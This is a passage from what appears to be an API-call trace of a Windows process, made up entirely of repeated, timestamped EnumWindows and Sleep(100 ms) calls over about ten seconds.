[0178.091] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.094] Sleep (dwMilliseconds=0x64) [0178.136] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.137] Sleep (dwMilliseconds=0x64) [0178.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.158] Sleep (dwMilliseconds=0x64) [0178.203] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.204] Sleep (dwMilliseconds=0x64) [0178.250] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.250] Sleep (dwMilliseconds=0x64) [0178.312] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.313] Sleep (dwMilliseconds=0x64) [0178.638] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.640] Sleep (dwMilliseconds=0x64) [0178.802] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.803] Sleep (dwMilliseconds=0x64) [0178.811] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.812] Sleep (dwMilliseconds=0x64) [0178.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.829] Sleep (dwMilliseconds=0x64) [0178.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.875] Sleep (dwMilliseconds=0x64) [0178.908] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.909] Sleep (dwMilliseconds=0x64) [0178.918] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.919] Sleep (dwMilliseconds=0x64) [0178.937] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.938] Sleep (dwMilliseconds=0x64) [0178.981] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0178.984] Sleep (dwMilliseconds=0x64) [0179.017] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.018] Sleep (dwMilliseconds=0x64) [0179.031] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.031] Sleep (dwMilliseconds=0x64) [0179.047] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.047] Sleep (dwMilliseconds=0x64) [0179.094] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.094] Sleep (dwMilliseconds=0x64) [0179.156] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.157] Sleep (dwMilliseconds=0x64) [0179.218] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.219] Sleep (dwMilliseconds=0x64) [0179.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.421] Sleep (dwMilliseconds=0x64) [0179.482] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.483] Sleep (dwMilliseconds=0x64) [0179.516] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.517] Sleep (dwMilliseconds=0x64) [0179.578] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.579] Sleep (dwMilliseconds=0x64) [0179.610] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.611] Sleep (dwMilliseconds=0x64) [0179.622] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.623] Sleep (dwMilliseconds=0x64) [0179.647] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.647] Sleep (dwMilliseconds=0x64) [0179.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.704] Sleep (dwMilliseconds=0x64) [0179.763] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.764] Sleep (dwMilliseconds=0x64) [0179.784] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.785] Sleep (dwMilliseconds=0x64) [0179.825] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.829] Sleep (dwMilliseconds=0x64) [0179.872] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.875] Sleep (dwMilliseconds=0x64) [0179.919] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.923] Sleep (dwMilliseconds=0x64) [0179.969] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.970] Sleep (dwMilliseconds=0x64) [0179.995] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0179.996] Sleep (dwMilliseconds=0x64) [0180.015] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.016] Sleep (dwMilliseconds=0x64) [0180.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.063] Sleep (dwMilliseconds=0x64) [0180.089] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.089] Sleep (dwMilliseconds=0x64) [0180.116] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.117] Sleep (dwMilliseconds=0x64) [0180.173] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.174] Sleep (dwMilliseconds=0x64) [0180.216] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.217] Sleep (dwMilliseconds=0x64) [0180.247] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.247] Sleep (dwMilliseconds=0x64) [0180.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.297] Sleep (dwMilliseconds=0x64) [0180.331] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.332] Sleep (dwMilliseconds=0x64) [0180.342] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.343] Sleep (dwMilliseconds=0x64) [0180.434] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.435] Sleep (dwMilliseconds=0x64) [0180.482] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.483] Sleep (dwMilliseconds=0x64) [0180.543] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.544] Sleep (dwMilliseconds=0x64) [0180.594] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.594] Sleep (dwMilliseconds=0x64) [0180.611] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.612] Sleep (dwMilliseconds=0x64) [0180.624] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.625] Sleep (dwMilliseconds=0x64) [0180.656] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.656] Sleep (dwMilliseconds=0x64) [0180.720] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.720] Sleep (dwMilliseconds=0x64) [0180.751] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.751] Sleep (dwMilliseconds=0x64) [0180.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.763] Sleep (dwMilliseconds=0x64) [0180.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.778] Sleep (dwMilliseconds=0x64) [0180.829] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.830] Sleep (dwMilliseconds=0x64) [0180.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.860] Sleep (dwMilliseconds=0x64) [0180.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.875] Sleep (dwMilliseconds=0x64) [0180.887] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.888] Sleep (dwMilliseconds=0x64) [0180.939] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.940] Sleep (dwMilliseconds=0x64) [0180.971] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.972] Sleep (dwMilliseconds=0x64) [0180.984] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0180.984] Sleep (dwMilliseconds=0x64) [0181.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.000] Sleep (dwMilliseconds=0x64) [0181.315] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.316] Sleep (dwMilliseconds=0x64) [0181.368] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.374] Sleep (dwMilliseconds=0x64) [0181.419] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.423] Sleep (dwMilliseconds=0x64) [0181.528] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.528] Sleep (dwMilliseconds=0x64) [0181.565] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.571] Sleep (dwMilliseconds=0x64) [0181.598] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.599] Sleep (dwMilliseconds=0x64) [0181.744] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.750] Sleep (dwMilliseconds=0x64) [0181.817] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.817] Sleep (dwMilliseconds=0x64) [0181.848] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.849] Sleep (dwMilliseconds=0x64) [0181.916] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.917] Sleep (dwMilliseconds=0x64) [0181.970] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0181.970] Sleep (dwMilliseconds=0x64) [0182.030] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.031] Sleep (dwMilliseconds=0x64) [0182.097] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.098] Sleep (dwMilliseconds=0x64) [0182.157] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.157] Sleep (dwMilliseconds=0x64) [0182.200] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.201] Sleep (dwMilliseconds=0x64) [0182.296] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.297] Sleep (dwMilliseconds=0x64) [0182.343] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.344] Sleep (dwMilliseconds=0x64) [0182.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.407] Sleep (dwMilliseconds=0x64) [0182.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.454] Sleep (dwMilliseconds=0x64) [0182.476] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.477] Sleep (dwMilliseconds=0x64) [0182.562] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.563] Sleep (dwMilliseconds=0x64) [0182.608] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.609] Sleep (dwMilliseconds=0x64) [0182.652] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.657] Sleep (dwMilliseconds=0x64) [0182.668] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.669] Sleep (dwMilliseconds=0x64) [0182.719] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.720] Sleep (dwMilliseconds=0x64) [0182.765] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.766] Sleep (dwMilliseconds=0x64) [0182.790] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.791] Sleep (dwMilliseconds=0x64) [0182.798] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.798] Sleep (dwMilliseconds=0x64) [0182.841] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.845] Sleep (dwMilliseconds=0x64) [0182.890] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.891] Sleep (dwMilliseconds=0x64) [0182.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.903] Sleep (dwMilliseconds=0x64) [0182.955] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0182.956] Sleep (dwMilliseconds=0x64) [0183.000] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.001] Sleep (dwMilliseconds=0x64) [0183.046] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.046] Sleep (dwMilliseconds=0x64) [0183.093] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.094] Sleep (dwMilliseconds=0x64) [0183.136] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.137] Sleep (dwMilliseconds=0x64) [0183.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.172] Sleep (dwMilliseconds=0x64) [0183.220] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.221] Sleep (dwMilliseconds=0x64) [0183.244] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.244] Sleep (dwMilliseconds=0x64) [0183.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.247] Sleep (dwMilliseconds=0x64) [0183.282] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.282] Sleep (dwMilliseconds=0x64) [0183.328] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.329] Sleep (dwMilliseconds=0x64) [0183.357] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.357] Sleep (dwMilliseconds=0x64) [0183.372] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.376] Sleep (dwMilliseconds=0x64) [0183.481] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.482] Sleep (dwMilliseconds=0x64) [0183.547] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.548] Sleep (dwMilliseconds=0x64) [0183.561] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.562] Sleep (dwMilliseconds=0x64) [0183.579] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.580] Sleep (dwMilliseconds=0x64) [0183.625] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.626] Sleep (dwMilliseconds=0x64) [0183.658] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.658] Sleep (dwMilliseconds=0x64) [0183.675] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.675] Sleep (dwMilliseconds=0x64) [0183.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.701] Sleep (dwMilliseconds=0x64) [0183.751] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.752] Sleep (dwMilliseconds=0x64) [0183.786] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.786] Sleep (dwMilliseconds=0x64) [0183.793] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.794] Sleep (dwMilliseconds=0x64) [0183.811] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.812] Sleep (dwMilliseconds=0x64) [0183.859] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.860] Sleep (dwMilliseconds=0x64) [0183.895] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.896] Sleep (dwMilliseconds=0x64) [0183.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.907] Sleep (dwMilliseconds=0x64) [0183.922] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.922] Sleep (dwMilliseconds=0x64) [0183.970] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0183.971] Sleep (dwMilliseconds=0x64) [0184.012] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.016] Sleep (dwMilliseconds=0x64) [0184.079] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.080] Sleep (dwMilliseconds=0x64) [0184.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.141] Sleep (dwMilliseconds=0x64) [0184.188] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.189] Sleep (dwMilliseconds=0x64) [0184.231] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.232] Sleep (dwMilliseconds=0x64) [0184.281] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.282] Sleep (dwMilliseconds=0x64) [0184.294] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.295] Sleep (dwMilliseconds=0x64) [0184.313] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.314] Sleep (dwMilliseconds=0x64) [0184.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.360] Sleep (dwMilliseconds=0x64) [0184.390] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.390] Sleep (dwMilliseconds=0x64) [0184.405] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.406] Sleep (dwMilliseconds=0x64) [0184.422] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.423] Sleep (dwMilliseconds=0x64) [0184.508] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.511] Sleep (dwMilliseconds=0x64) [0184.585] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.586] Sleep (dwMilliseconds=0x64) [0184.590] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.591] Sleep (dwMilliseconds=0x64) [0184.610] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.611] Sleep (dwMilliseconds=0x64) [0184.675] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.675] Sleep (dwMilliseconds=0x64) [0184.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.701] Sleep (dwMilliseconds=0x64) [0184.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.734] Sleep (dwMilliseconds=0x64) [0184.778] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.778] Sleep (dwMilliseconds=0x64) [0184.796] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.797] Sleep (dwMilliseconds=0x64) [0184.811] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.812] Sleep (dwMilliseconds=0x64) [0184.856] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.859] Sleep (dwMilliseconds=0x64) [0184.901] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.902] Sleep (dwMilliseconds=0x64) [0184.950] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.953] Sleep (dwMilliseconds=0x64) [0184.989] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.990] Sleep (dwMilliseconds=0x64) [0184.997] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0184.997] Sleep (dwMilliseconds=0x64) [0185.062] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.063] Sleep (dwMilliseconds=0x64) [0185.092] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.093] Sleep (dwMilliseconds=0x64) [0185.115] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.116] Sleep (dwMilliseconds=0x64) [0185.171] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.172] Sleep (dwMilliseconds=0x64) [0185.220] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.221] Sleep (dwMilliseconds=0x64) [0185.234] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.235] Sleep (dwMilliseconds=0x64) [0185.251] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.252] Sleep (dwMilliseconds=0x64) [0185.297] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.298] Sleep (dwMilliseconds=0x64) [0185.341] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.341] Sleep (dwMilliseconds=0x64) [0185.395] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.396] Sleep (dwMilliseconds=0x64) [0185.442] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.443] Sleep (dwMilliseconds=0x64) [0185.449] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.450] Sleep (dwMilliseconds=0x64) [0185.516] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.517] Sleep (dwMilliseconds=0x64) [0185.596] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.597] Sleep (dwMilliseconds=0x64) [0185.606] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.607] Sleep (dwMilliseconds=0x64) [0185.633] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.634] Sleep (dwMilliseconds=0x64) [0185.688] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.688] Sleep (dwMilliseconds=0x64) [0185.737] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.738] Sleep (dwMilliseconds=0x64) [0185.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.747] Sleep (dwMilliseconds=0x64) [0185.798] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.799] Sleep (dwMilliseconds=0x64) [0185.843] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.844] Sleep (dwMilliseconds=0x64) [0185.914] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.915] Sleep (dwMilliseconds=0x64) [0185.969] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.970] Sleep (dwMilliseconds=0x64) [0185.995] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0185.998] Sleep (dwMilliseconds=0x64) [0186.028] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.028] Sleep (dwMilliseconds=0x64) [0186.079] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.081] Sleep (dwMilliseconds=0x64) [0186.130] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.130] Sleep (dwMilliseconds=0x64) [0186.137] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.138] Sleep (dwMilliseconds=0x64) [0186.184] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.187] Sleep (dwMilliseconds=0x64) [0186.242] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.243] Sleep (dwMilliseconds=0x64) [0186.246] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.247] Sleep (dwMilliseconds=0x64) [0186.299] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.300] Sleep (dwMilliseconds=0x64) [0186.365] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.365] Sleep (dwMilliseconds=0x64) [0186.375] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.376] Sleep (dwMilliseconds=0x64) [0186.450] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.453] Sleep (dwMilliseconds=0x64) [0186.500] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.500] Sleep (dwMilliseconds=0x64) [0186.559] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.563] Sleep (dwMilliseconds=0x64) [0186.700] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.704] Sleep (dwMilliseconds=0x64) [0186.725] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.725] Sleep (dwMilliseconds=0x64) [0186.731] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.731] Sleep (dwMilliseconds=0x64) [0186.762] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.767] Sleep (dwMilliseconds=0x64) [0186.812] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.813] Sleep (dwMilliseconds=0x64) [0186.839] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.840] Sleep (dwMilliseconds=0x64) [0186.906] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.907] Sleep (dwMilliseconds=0x64) [0186.949] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.950] Sleep (dwMilliseconds=0x64) [0186.968] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0186.969] Sleep (dwMilliseconds=0x64) [0187.192] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.247] Sleep (dwMilliseconds=0x64) [0187.301] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.301] Sleep (dwMilliseconds=0x64) [0187.359] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.359] Sleep (dwMilliseconds=0x64) [0187.417] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.419] Sleep (dwMilliseconds=0x64) [0187.438] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.439] Sleep (dwMilliseconds=0x64) [0187.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.453] Sleep (dwMilliseconds=0x64) [0187.533] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.533] Sleep (dwMilliseconds=0x64) [0187.681] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.682] Sleep (dwMilliseconds=0x64) [0187.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.718] Sleep (dwMilliseconds=0x64) [0187.734] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.735] Sleep (dwMilliseconds=0x64) [0187.781] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.781] Sleep (dwMilliseconds=0x64) [0187.811] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.811] Sleep (dwMilliseconds=0x64) [0187.824] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.825] Sleep (dwMilliseconds=0x64) [0187.874] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.875] Sleep (dwMilliseconds=0x64) [0187.903] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.904] Sleep (dwMilliseconds=0x64) [0187.921] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.922] Sleep (dwMilliseconds=0x64) [0187.984] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0187.985] Sleep (dwMilliseconds=0x64) [0188.013] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.013] Sleep (dwMilliseconds=0x64) [0188.032] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.033] Sleep (dwMilliseconds=0x64) [0188.075] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.075] Sleep (dwMilliseconds=0x64) [0188.120] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.121] Sleep (dwMilliseconds=0x64) [0188.140] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.141] Sleep (dwMilliseconds=0x64) [0188.233] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.234] Sleep (dwMilliseconds=0x64) [0188.257] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.258] Sleep (dwMilliseconds=0x64) [0188.262] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.262] Sleep (dwMilliseconds=0x64) [0188.281] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.282] Sleep (dwMilliseconds=0x64) [0188.327] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.328] Sleep (dwMilliseconds=0x64) [0188.347] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.347] Sleep (dwMilliseconds=0x64) [0188.358] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.359] Sleep (dwMilliseconds=0x64) [0188.403] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.406] Sleep (dwMilliseconds=0x64) [0188.452] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.453] Sleep (dwMilliseconds=0x64) [0188.466] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.469] Sleep (dwMilliseconds=0x64) [0188.484] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.485] Sleep (dwMilliseconds=0x64) [0188.514] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.515] Sleep (dwMilliseconds=0x64) [0188.561] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.562] Sleep (dwMilliseconds=0x64) [0188.600] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.601] Sleep (dwMilliseconds=0x64) [0188.640] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.641] Sleep (dwMilliseconds=0x64) [0188.672] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.673] Sleep (dwMilliseconds=0x64) [0188.717] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.718] Sleep (dwMilliseconds=0x64) [0188.732] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.733] Sleep (dwMilliseconds=0x64) [0188.746] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.747] Sleep (dwMilliseconds=0x64) [0188.794] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.797] Sleep (dwMilliseconds=0x64) [0188.836] EnumWindows (lpEnumFunc=0x563dd0, lParam=0x550000) [0188.837] Sleep 